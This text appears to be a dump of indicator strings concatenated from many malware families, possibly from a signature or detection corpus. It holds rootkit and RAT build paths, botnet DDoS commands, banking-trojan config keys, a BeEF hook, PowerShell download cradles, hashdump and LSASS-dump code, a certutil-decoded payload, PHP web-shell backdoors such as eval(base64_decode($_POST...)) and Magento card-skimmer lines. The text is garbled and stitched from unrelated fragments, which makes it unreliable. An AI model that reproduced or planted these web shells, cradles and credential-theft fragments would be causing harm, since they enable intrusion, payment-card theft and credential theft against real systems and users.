C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdbd:\\proj\\cn\\fa64\\sengoku_Win32.sys\x00rk_ntsystem.c\\uroboros\\shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}
id-at-postalAddress%
id-ce-keyUsageKey UsageU
id-at-commonName2
RSA-alt%
%sexpires on    : %04d-%02d-%02d %02d:%02d:%02d178.162.197.9\
id-at-serialNumberECDSA with SHA256A
WinRAT-Win32-Release.exeR
sha-1WithRSAEncryptionPostal codeTLS-RSA-WITH-3DES-EDE-CBC-SHAchecking match for '%s' user %s host %s addr %sPEM_read_bio_PrivateKey failedusage: %s [-ehR] [-f log_facility] [-l log_level] [-u umask]%s %s for %s%.100s from %.200s port %d%sclapi32.dllConnection from %s port %d/usr/etc/ssh_known_hostsVersion: %s - %s %s %s %s[-] connect()/bin/sh /usr/etc/sshrckexecdhs.c%s: setrlimit(RLIMIT_FSIZE, { 0, 0 }): %sRunFile: couldn't load SHELL32.DLL!RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!E
Invalid input handle!!!P
) -%s-> %s (c
DEBUG: Cannot allocate memory for ptrNextNode->ptrNext!F
DEBUG: Cannot allocate memory for ptrFileArray!%
/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s%SYSTEMROOT%\\temp\\_dbg.tmp%SYSTEMROOT%\\SysWOW64\\mspool.dll%SYSTEMROOT%\\System32\\dpcore16t.dll%SYSTEMROOT%\\System32\\wdigestEx.dll%SYSTEMROOT%\\System32\\mspool.dll%SYSTEMROOT%\\System32\\kernel32.dll%SYSTEMROOT%\\SysWOW64\\iastor32.exe%SYSTEMROOT%\\System32\\msvcse.exe%SYSTEMROOT%\\System32\\mshtaex.exe%SYSTEMROOT%\\System32\\iastor32.exe%SYSTEMROOT%\\SysWOW64\\mshtaex.exeInstaller.exeInfo: Process %sError: GetFileTime %s 0x%xInstall succeededError: RegSetValueExA 0x%xhttp://www.java.com/en/download/installed.jsp?detect=jreC
Guangzhou YuanLuo Technology Co.Guangzhou YuanLuo Technology Co.,Ltd$Asahi Kasei Microdevices Corporation0\
Cookie: SN=\
http://www.wasabii.com.tw 0'Wymajtec$Tima Stempijg Sarviges GA -$G2AHDNEAFE1.sysSOTEFEHJ3.sysMainSYS64.sys\
%x:%d->%x:%d, Flag %s%s%s%s%s, seq %u, ackseq %u, datalen %uFWPKCLNT.SYSP
%x->%x, icmp type %d, code %d\
Bad packet\
FwpsReferenceNetBufferList0{3ec05b4a-ea88-1378-3389-66706ba27600}master secretMyEngineNetEventCannot execute (%d)SvcNameUsers\\Wool3n.H4t\\C-CPP\\CWoolgerN
oShellLink.Hotkey = \"CTRL+SHIFT+F\"set WshShell = WScript.CreateObject(\"WScript.Shell\")oShellLink.IconLocation = \"notepad.exe, 0\"set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")wlg.datw
[Enter][Control]modules\\exploits\\littletools\\agent_wrapper\\release... get header FATAL ERROR !!!  %d bytes read > header_sizei
connect_back_tcp_channel#do_connect:: Error resolving connect back hostnamekernel32.dll GetProcAddressLoadLibraryAws2_32.dllC
Attempting to unlock uninitialized lock!unable to load kernel32.dll%s len:%d Encountered error sending syscall response to client/info.datError entering thread lockError exiting thread lockconnect_back_tcp_channel_init:: socket() failedmitb.poisonAnchorthis.request(this.httpprotobeef.logger.get_dom_identifierreturn (!!window.operahistory.pushState({ Be:\"EF\" }window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/10\\./)window.navigator.userAgent.match(/Opera\\/9\\.80.*Version\\/11\\./)window.navigator.userAgent.match(/Avant TriCore/)window.navigator.userAgent.match(/Iceweaselmitb.sniff(Method XMLHttpRequest.open override.browser.hasWebSocket.mitb.poisonFormresolved=require.resolve(file,cwd||if (document.domain == domain.replace(/(\\r\\n|\\n|\\r)/gmbeef.net.requestuagent.search(engineOpera)beef.logger.start-ep bypass-executionpolicy bypass-win hidden-w hidden-encodedcommand.300000000.saz.pcap.chlsAlina v1.01[0-2])[0-9]
IGFhsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsysti
AppData\\Local\\Temp\\_.net_\\msiexec.exetype:on_execuid:%spriv:%sarch:x%sgend:%scores:%iver:%snet:%s|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s||type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|filesearch.stoprapidgetlayer4.slowlorisrudyddos.war.smartviewftp.upload%s %s :%s LAYER4 Combo Flood: Stopped%s %s :%s IRC War: Flood started [Type: %s | Target: %s]%s %s :%s FTP Upload: FailedAthena v2%s %s :%s ECF Flood: Stopped [Total Connections: %ld | Rate: %ld Connections/Second]ARME flood on %s/%s:%i for %i seconds [Host confirmed vulnerable Rapid HTTP Combo flood on %s:%i for %i secondsBegan flood: %i connections every %i ms to %s:%iIPKiller>AthenaAthena=Shit!Athena-v1BTC wallet.dat file foundMineCraft lastlogin file foundProcess '%s' was found and scheduled for deletion upon next rebootUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)Rapid Connect/DisconnectBTC wallet.dat found,:!arme:!openurl:!condis:!httpcombo:!urlblock:!udp:!btcwallet533D9226E4C1CE0A9815DBEB19235AE4X-TS-Rule-Name: %sX-TS-Rule-PatternID: %uX-TS-BotID: %sX-TS-Domain: %sX-TS-SessionID: %sX-TS-Header-Cookie: %SX-TS-Header-Referer: %SX-TS-Header-AcceptEncoding: %SX-TS-Header-AcceptLanguage: %SX-TS-Header-UserAgent: %S_hvnc_init@4_hvnc_uninit@0_hvnc_start@8_hvnc_stop@0_hvnc_wait@0_hvnc_work@0nspr4.dllnss3.dllchrome.dllU
ShellExecuteExW
SHELL32.dll
GetUserNameExW
Secur32.dll
D19FC0FB14BE23BCF35DA427951BB5AEurl_loader=%Surl_webinjects=%Surl_tokenspy=%Sfile_webinjects=%Smoneyparser.enabled=%uenable_luhn10_post=%uinsidevm_enable=%udisable_antivirus=%ucommand= raw_input(\"Enter command: \").strip('n')print '[-] (Failed to load moduli -- gex will be unsupported.)'print '[-] Listen/bind/accept failed: ' + str(e)chan.send(command)print '[-] SSH negotiation failed.'except paramiko.SSHException, x:&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s%s @ %sUpload KeyLogs
DreatePipeHetSystemDirectoryASeleaseMutexDloseWindowStationDontrolService~hhC2F~.tmp~_MC_3~simpleloginpostdatapostblackrevudpdataantiddosfastddosslowhttpallhttptcpdatadatagetm_ComputerObjectProviderMyWebServicesget_ExecutablePathget_WebServicesMy.WebServicesMy.Userm_UserObjectProviderDelegateCallbackTargetMethod0
uconsolasclUn
info.inipi4izd6vp0.comS
Find_RepeatProcessS
WH_KEYBOARD_LLWSock32.dllWININET.dll\\Chicken\\Release\\svchost.pdb\\IntergrateCHK\\Release\\IntergrateCHK.pdbfake.cf8.8.8.8Processor(%d)\\DbProtectSupportdm1712/`jvpnpkte/bplInstallService NPF %d68961InstallService DbProtectSupport %dC:\\Program Files\\DbProtectSupport\\npf.sysfake.cfgThreadAttack.cppFake.cppdns_arrayDomainRandExcpu %llu %llu %llu %llu[ %02d.%02d %02d:%02d:%02d.%03ld ] [%lu] [%s] %sCoded by BRIAN KREBS for personnal use only. I love my job & wife.http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x%02x.php%BOTID%%BOTNET%bc_removebc_addhttp://www.google.com/webhpCoded by BRIAN KREBS for personal use only. I love my job & wife
zecho -----BEGIN CERTIFICATE----- >echo -----END CERTIFICATE----- >>certutil -decode VC92Ny9TSXZMNk5jLy8vOUlqUTFVRlFNQTZMLysvdjlJaTh2L0ZUNXJBUUJJaTFRa1NFaUx6K2hWSS8vL1NJME44bklCQU9pZC92Ny9USTJjSkpBQUFBQXp3RW1MV3hCSmkyc1lTWXR6S0VtTDQxL0R6TXhNaTl4SmlWc0lUWWxMSUUySlF4aFZWbGRCVkVGVlFWWkJWMGlCN1BBQUFBQklnMlFrYUFDNE1BQUFBRW1MNkVTTmNPQ0pSQ1JnaVVRa1pFbU5RN0JKaTlsTWpRWFBGQU1BU0lsRpd3ovN3FlalVtNklLQ0xNNGtOV1BiY0VOVHROT0Zud25CWGN0WS9BcEdMR28rK01OWm85Nm9xMlNnY1U5aTgrSTBvNkFob1FOTzRHQWdtUElEVmlqald0Tk90b2FmN01ESWJUQkF5T0pYbTB4bFVHRTBZWEFWOXVoNHBkQnRrS0VFWWVBSEE2TDFzU0c5a2ZFTEc3QWd4WTBYY1l3ZzB6QUFXS09JZE9wQVhEK3lnS3lsR3B5Q1ljR1NJdFNseGZKWUlVVkNFdEZPVjRJUldERUl1QXpKZ2pCQWdsd0Vantdll.exePKAcroRd32.exePKSetup=ntdll.exe\x0d\x0aSilent=1\x0d\x0aSetup=%temp%\\AcroRd32.exe\x0d\x0aLeave GetCommand!perform exe success!perform exe failure!Entry SendCommandReq!LeaveDealUpfile!Entry PostData!Leave PostFile!Entry PostFile!\\unknow.zipthe url no respon!Control_RunDLL/cxpid/submit.php?SessionID=/cxgid/E21BC52BEA2FEF26D005CFE21BC52BEA39E435C40CD8                   -,L-,O+,Q-,R-,Y-,S-U
ddos.tf
TCP_KEEPINTVL
TCP_KEEPCNT
Accept-Language: zh%d Kb/bps|%d%%{!}DRZ{!}User-Agent: UploadorSteamAppData.vdfloginusers.vdfconfig.vdfJ
UpdateMutex:response=scanin:UPDATE_BUNISTALL_BS_PROTECTP_WALLETGR_COMMANDFTPUPLOAD-ip2-post1-post2-udplogin=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]-timeout-thread Local; ru) Presto/2.10.289 Version/-icmp<xmp>-long99=1X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*Nullsoft
SSFKhttp://xa.xingcloud.com/v4/sof-everything/http://www.mysearch123.com21e223b3f0c97db3c281da1g7zccaefozzjcktmlmaY
RookIE/1.0$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])$enc = Get-PostHashdumpScript$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);Install-SSP -Path .\\mimilib.dll$FinalShellcode.Length@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool= \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQInvoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)$Base64Decoded = [Convert]::FromBase64String($Cpassword)$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recursefunction Get-DecryptedCpassword {$up = Test-Connection -count 1 -Quiet -ComputerName $Computer $out | add-member Noteproperty 'Password' $PasswordExploit-JBoss$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:servicehttp://blog.rvrsh3ll.netRemote URL to your own WARFile to deploy.[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);egress -ip $ip -port $c -delay $delay -protocol $protocol\\PowerShellRunner.pdbP
ReflectivePick_x64.dll$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,$ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"Invoke-PsExecCmd\"[*] Executing service .EXE$cmd = \"%COMSPEC% /C echo $Command ^> %systemroot%\\Temp\\# upload to a specified exfil URIServer path to exfil to.[*] PDC: LAB-2008-DC1.lab.com$attempts = Get-UserBadPwdCount $userid $dcs$RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000-Dll evil.dll$UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )$Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAInvoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command \"id\"Write-Verbose \"[*] Error loading dll\"Write-BytesToMemory -Bytes $Shellcode$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath$Result = sc.exe pause $($TargetService.Name)$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)#Shellcode: CallDllMain.asm$wc.Headers.Add(\"User-Agent\",$script:UserAgent)$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)if ($script:AgentDelay -ne 0){if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))remote DLL injection$inveigh.SMBRelay_failed_list.Add(\"$HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string $SMBRelayTarget\")$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)Test-Port -h $h -p $Port -timeout $Timeout1 {$nHosts=10;  $Threads = 32;   $Timeout = 5000 }Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }# Get a handle to the module specified$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle$Shellcode1 += 0x48$PEHandle = [IntPtr]::Zeroif ($ExeArgs -ne $null -and $ExeArgs -ne '')$ExeArgs = \"ReflectiveExe $ExeArgs\"
D:\\work\\\xe6\xba\x90\xe5\x93\xa5\xe5\x85\x8d\xe6\x9d\x80\\tmp\\Release\\ServiceDll.pdbe:\\programs\\LuridDownLoaderLuridDownloader for FalconDllServiceTrojan\\k\\\xe6\xa1\x8c\xe8\x9d\xa2\\EtenFalcon\xef\xbc\x88\xe4\xbf\xae\xe6\x94\xb9\xef\xbc\x89Madonna\x00Jesus/iupw82/netstatefuckNodAgainiloudermaoCrpq2.cgiClnpp5.cgiDqpq3ll.cgidieosn83.cgiRwpq1.cgi/Ccmwhite/Cmwhite/Crpwhite/Dfwhite/Query.txt/Ufwhite/cgl-bin/Clnpp5.cgi/cgl-bin/Crpq2.cgi/cgl-bin/Dwpq3ll.cgi/cgl-bin/Owpq4.cgi/cgl-bin/Rwpq1.cgi/trandocs/mm//trandocs/netstatNFal.exeLINLINVMAN7NFP4R9WPOWERPNT.exe%APPDATA%\\Microsoft\\Windows\\%HOMEPATH%Server2008Server2003Server2003R2Server2008R2%HOMEDRIVE%%ComSpec%M
iphlpsvc.tmpR
XpsUnregisterServerXpsRegisterServer{53A4988C-F91F-4054-9076-220AC5EC03F3}EEE\x0d\x0aTKE\x0d\x0aVPE\x0d\x0aVPS\x0d\x0aWFSE\x0d\x0aWFSS\x0d\x0aCM**\x0d\x0aT
Win7ElevateV2\\x64\\Release\\R
COMCTL32.dllU
Fubuki.dllCabinet.dll\\UACElevator.pdb%userprofile%\\Downloads\\dwmapi.dll%windir%\\system32\\dwmapi.dllInfection module: %sCould not save module to %s%s%s%p%s%ld%s%d%sStack area around _alloca memory reserved by this function is corruptedStack around the variable 'M
Address: 0xs4u.exe Domain\\Username [Extra SID]\\Release\\s4u.pdbCreateProcessAsUser failed (error %u).GetTokenInformation failed (error: %u).LsaLogonUser failed (error 0x%x).LsaLogonUser: OK, LogonId: 0x%x-0x%xLookupPrivilegeValue failed (error: %u).The token does not have the specified privilege (%S).Unable to parse command line.Unable to find logon SID.AdjustTokenPrivileges failed (error: %u).AdjustTokenPrivileges (%S): OKS
.rsrcHeapFreeConvertStringSidToSidAllocateLocallyUniqueIdADVAPI32.dllLsaLookupAuthenticationPackageMSVCR120.dll\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12Ezcobl\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x12620110113144935bitsadmin /transferdel rm.batav_list=
\\boot.lnk%USERPROFILE%W
\\aapz.tmpC:\\Documents and Settings\\A\\\\Perform\\Release\\Perform.pdbB
\\browser.exee
e!QAZ4rfv:&:-:=:J:O:\\:m:r:6)6/666;6N6W6^6c6t6y6666Q6V6b6g6~60%0,010A0F0K0\\0a0f0w0|06!6(63686E6J6W6\\6i6n6{63 3%33383=3J3R3`3e3o3t3~34 4'40454:4G4M4R4_4e4j4w41#1(141=1B1N1T1Y1e1k1p1|1?(?2?<?C?J?Q?X?_?f?m?t?{??#?*?1?8???F?M?T?[?b?i?p?w?6)6/646@6F6K6W6]6b6n6w6|64#40454:4G4L4Q4^4c4h4u4z4<\"<'<3<8<=<I<N<S<_<d<i<u<z<>%>/>9>@>G>N>U>\\>c>j>q>WTZDAE060>0E0K0P0\\0b0g0v0|04#4-474A4K4U4\\4f4p4z47\"7,767@7J7T7^7h7q7{7;\";';4;E;J;W;k;p;};;0;;;F;Q;\\;g;r;};
5(666Z6c6Wlm;y%UD%d;1;9;@;G;N;U;\\;c;j;q;x;8 8'8.858<8C8J8Q8X8_8f8m8t82 2,282=2B2G2P2U2Z2_2h2s2x24'5.555<5C5J5Q5X5_5f5m5t5{50#0*01080?0F0M0T0[0b0i0p0w06$6,616=6B6G6S6X6]6i6n6s6=\"=)=0=7=>=E=L=S=Z=a=h=6&6-646;6B6I6P6W6^6e6l6s6z6O.QrH@>\">/>4>A>F>S>X>e>j>w>|>0#0(040=0B0N0T0Y0e0k0p0|05)5/545@5F5K5W5`5e5q5w5|5=!=&=3=8=E=N=S=`=e=s=x=}=:(:/:6:=:D:K:R:Y:`:g:n:u:|:7\"727<7F7M7W7a7k7u72+21262E2K2P2\\2h2m2|2;/;5;:;G;V;\\;a;n;};;\";-;8;C;N;^;i;t;
B+P:\\66.666K6S6d6l6}60!0&0+0<0A0F0W0\\0a0n0z0;#;);.;:;@;E;Q;W;\\;h;q;v;2#2-222F2L2W2\\2b2g2x2~29\"9)90979>9E9L9S9Z9k9}96-747;7B7I7P7W7^7e7l7s7z74\"4'43494>4J4P4U4a4g4l4x4:#:(:4:::?:K:T:Y:e:k:p:|:WD.hyA<\"<)<0<7<><E<L<S<Z<a<h<=&=,=1=>=D=I=V=_=d=q=w=|=; ;(;0;8;@;H;P;X;`;h;p;{;<\"<)<0<7<><E<L<S<Z<a<h<o<v<6#6(616;6@6I6S6X6d6n6s6|6(%r-c;u3%3G3N3U3\\3c3j3q3x37\"767T7[7b7i7p7w7~71 1-1>1C1P1a1f1s18 8&8,8A8M8^8d8i8
:%:0:;:F:Q:\\:p:|:6.666>6F6N6V6^6f6n6v6~66!6(6/666=6D6K6R6Y6r6:71t83jL.bjG6!61666V6]6p62%2D2P2`2p2|242494@4G4N4U4\\4c4j4q4x49+92999@9G9N9U9\\9c9j9q9x94!4&43484E4J4W4\\4i4n4s45$5+52595@5G5N5U5\\5c5j5q51.252<2C2J2Q2X2_2f2m2t2{28 8%818:8?8K8Q8V8b8h8m8y89'93989=9B9K9P9U9Z9c9n9s9:\":':,:8:=:B:R:Z:`:e:v:}:=#=(=4=:=?=K=Q=V=b=k=p=|== =*=1=8=?=F=M=T=[=b=i=p=w=~=3&3-343;3B3I3P3W3^3e3l3s3z3:!:(:/:6:=:I:N:S:`:f:k:x:~:cMDkAjy==#=/=4=9=E=J=O=[=`=e=q=v={=
:\":':,:5:=:B:K:P:U:^:c:h:q:v:{:Y@.hdd \\0$0+02090@0G0N0U0\\0c0j0v0{06\"6(6-6:6I6O6T6a6p6v6{61\"1/14191F1K1P1]1b1g1t1y1~10\"0(0-0<0B0G0S0_0d0s0y0~09\"9'959:9?9L9Q9^9c9p9y9~93%3*363=3B3N3T3Y3e3k3p3|34#4)4.4:4C4H4T4Z4_4k4q4v4|&.WTm6#63686E6J6W6\\6i6n6{6;\";(;7;F;W;];f;o;{;0+02080>0B0P0\\0i0|01 1(10181C1N1Y1d1o1z13 3%3*3;3@3E3R3^3c3t3y38\"8)8.8:8?8S8X8f8r8x88$8+82898@8G8N8U8\\89-929?9P9U9b9s9x99*9/9<9A9N9T9`9e9r9w92-292?2G2N2U2\\2c2j2q29u
uOh4XC
yDYYVV
D$(hDtC
GDh\aC
u6hLXC
L$LQWPV
:$:+:2:9:@:G:N:U:\\:s:6%6+606<6H6M6\\6b6g6v6}68\"8,818;8@8J8O8Y8^8h8m8w86 6'6.656<6C6J6Q6X6_6f6m6t64\"4)40474>4E4L4S4Z4a4h49\"9+91969?9E9J9S9\\9a9j9p9u9~99\"9'91999C9H9R9W9a9f9p9u94\"4(4-4<4B4G4S4_4d4s4y4~46\"6'6,6=6B6G6X6]6b6o6{6?\"?/?4?B?G?L?Y?^?k?p?}?3)31383>3C3L3R3W3c3i3n3w3}3;&;+;5;:;D;I;S;X;b;j;t;y;='=,=6=>=H=M=W=\\=a=m=r=w=:!:*:/:9:>:H:P:Z:_:i:n:x:}:3$3.383B3L3S3Z3a3h3o3v3}3<$<.<3<=<B<L<Q<^<c<m<r<|<31383?3F3M3T3[3b3i3p3w3~39!9(9/969=9D9K9R9Y9`9g9n9x9:$:*:/:8:>:C:L:U:Z:c:i:n:w:|:
SSWWWV
P@YYY_^
P@YYQP
D$4Wh@GD
Attempting to create more than one keyboard::Monitor instance{Right windows}Access violation - no RTTI data!
Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)\" target=\"NewRef\"></a>c
OPERA.EXE
n%d (!=0),user/pass auth will not work, ignored.\n/etc/TZ,M4.1.0,M10.5.0%u.%u.%u.%u.in-addr.arpaGET /r/sr.arm5 HTTP/1.0NIF\nANSI_CHARSET][Vee_d_[qfcD:6<%-%/%1%3%5%7%9%;%imhzxsc\\WWKD<.)wVzlarf\\]VOZVMskfJKWFAp\\Z<aLLwhgbdLeftToRightF/.pTC7O><8,)-$ mjeUB>D.'8)5\\\\vhe[JGiVRk[W]PL(zwWNNG:8zv7,'$#hsdfihdfpolska.irc.plfirehim@o2.plfirehim@go2.plfirehim@tlen.plcyberpunks.plkaper.phrack.plserwer.uk.tons1.ipv4.huscorebot.koth.huesopoland.plG
%USERPROFILE%\\IEXPL0RE.EXE\"<770j ((\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IEXPL0RE.LNK\\Documents and Settings\\%s\\Application Data\\Microsoft\\Internet Explorer\\IEXPL0RE.EXELoaderV5.dllPOST /index%0.9d.asp HTTP/1.1GET /search?n=%0.9d&DUDE_AM_I_SHARP-3.14159265358979x6.626176WHO_A_R_E_YOU?2.99792458x1.25663706143592BASTARD_&&_BITCHES_%0.8xc:\\bbb\\eee.txt
/.md/cgi-mac/xnocz1checkvir.plist/Users/apple/Documents/mac backiMuler2/Users/imac/Desktop/macback/xntaskz.gz2wmsetstatus.cgilaunch-0rp.dat2wmupload.cgixntmpz2wmrecvdata.cgixnorz62wmdelfile.cgi/LanchAgents/checkvir0PERA:%s/tmp/Spotlight/tmp/launch-ICS000
XTALKER7Insta11 MicrosoftwudMessageECD4FC4D-521C-11D0-B792-00A0C90312E1B12AE898-D056-4378-A844-6D393FE37956LoadSTRINGInitializeKeyHookFindResourcesLoadSTRINGFromHKCUhccutils.DLLH:\Fast\Plug(hkcmd)\dll\Release\HijackDll.pdb4673SeCreateGlobalPrivilegeWindows\\System32\\sysprep\\sysprep.exeNetwork Access Management Agents }
tid=%d&ta=%s-%xfid=%d%[^.].%[^(](%[^)])%s [%s %d] 77 %sGlobal\\%s%xInject::InjectProcessByName()Inject::CopyImageToProcess()Inject::InjectProcess()Inject::InjectImageToProcess()Drop::InjectStartThread()ExploitMS10_092\\globalroot\\systemroot\\system32\\tasks\\<RunLevel>HighestAvailable</RunLevel>v
bisonal
%s\\rundll32.exe \"%s\", ShadowPlaynvdisps.dll%snvdisps.dll\\winhlp32.exenvdisps_user.dat%snvdisps_user.datProgramData\\RasTls\\RasTls.exeProgramData\\RasTls\\rundll32.exeProgramData\\RasTls\\svchost.exeWindows\\System32\\regsvr32.exe4689Windows\\System32\\mshta.exeWindows\\System32\\WindowsPowerShell\\v1.0\\powershell.exeWindows\\System32\\wbem\\WmiPrvSE.exe%s=?getname&COMPUTER=^xJWFwcGRhdGElAA=JVdJTkRJUibtcplugPsExec.exeWindows\\System32\\net.exeWindows\\System32\\at.exeInvalid key length used to initialize BlowFish.GetPCProxyHandlerStartPCProxySetPCProxyHandler
ELFStatus: OK--scryptstratum+tcp://cmd.so/Challengecpu modelpassword is wrongpassword:uthentication failedecho -n -e elan2elan3chmod: not foundcat /proc/cpuinfo/proc/%s/cmdlinekill %sEDIT_SERVER
/h.gHTTPHeadGet/Library/launchedMy connect error with no ip!Send File is Failed****************************You Have got it!****************************TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjETW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ==[\"cookie\",\"\"realauth=\"location\"];d3RmZXhlinclude '../../../../../../../../../../app/Mage.php'; Mage::app(); $q = Mage::getModel('sales/quote_payment')->getCollection();../../../../../../app/Mage.php'; Mage::app(); var_dump(Mage::getModel('sales/order')rUl6QttVEP5eqf9usxfJjgoOvdNWFSGoHDgluk+4ONwXQNbGniQLttfyrgkB8d9base64_decode('b25lcGFnZXxnY19hZG1pbg==')DNEcHdQbWtXU3dSMDA1VmZ1c29WUVFXdUhPT0xYb0k3ZDJyWmFVZlF5Y0ZEeHV4K2FnVmY0OUtjbzhnc0U3hkTVVibSt2MTgyRjY0VmZlQWo3d1VlaFJVNVNnSGZUVUhKZXdEbGxJUTlXWWlqWSt0cEtacUZOSXF4crb2JHaTJVdURMNlhQZ1ZlTGVjVnFobVdnMk5nbDlvbEdBQVZKRzJ1WmZUSjdVOWNwWURZYlZ0L1BtNCteval(base64_decode($_POSTeval($undecode($tongji))<strong>WwW.Zone-Org</strong>echo eval(urldecode($dez = $pwddir.\"/\".$real;copy($uploaded, $dez);@$_($_REQUEST['eval(xxtea_decrypt** Scam Redirector$ooooo00oo0000oo0curl_close($cu);eval($o);};die();
fopen(\"cache.php\", \"w+\")0B6KVua7D2SLCNDN2RW1ORmhZRWs/sp_tilang.jsif(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<b>up!!!</b><br><br>';}}echo \"IndoXploit - Auto Xploiter\"eval(base64_decode($a));(preg_match('/\\/admin\\/Cms_Wysiwyg\\/directive\\/index\\//', $_SERVER['REQUEST_URI']))eval(gzinflate(base64_decode(str_rot13(strrev(attribute_code=0x70617373776f72645f68617368))unlink('../media/catalog/category/'.basename($if(isset($_GET['do'])){$g0='adminhtml/default/default/images'stripos($buf, 'Visbot')!==false && stripos($buf, 'Pong')!==falsestripos($buf, 'Visbot') !== false && stripos($buf, 'Pong')<?PHP /*** Magento** NOTICE OF LICENSE** This source file is subject to the Open Software License (OSL 3.0)* that is bundled with this package in the file LICENSE.txt.* It is also available through the world-wide-web at this URL:* http://opensource.org/licenses/osl-3.0.php**/$$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'if(md5(@$_COOKIE[qz])==($_=@$_REQUEST[q]).@$_($_REQUEST[z]);@eval(stripslashes($_REQUEST[q]));$log_entry = serialize($ARINFO)curl_setopt($ch, CURLOPT_POSTFIELDS,http_build_query(array('data'=>$data,'utmp'=>$id)));killall -9 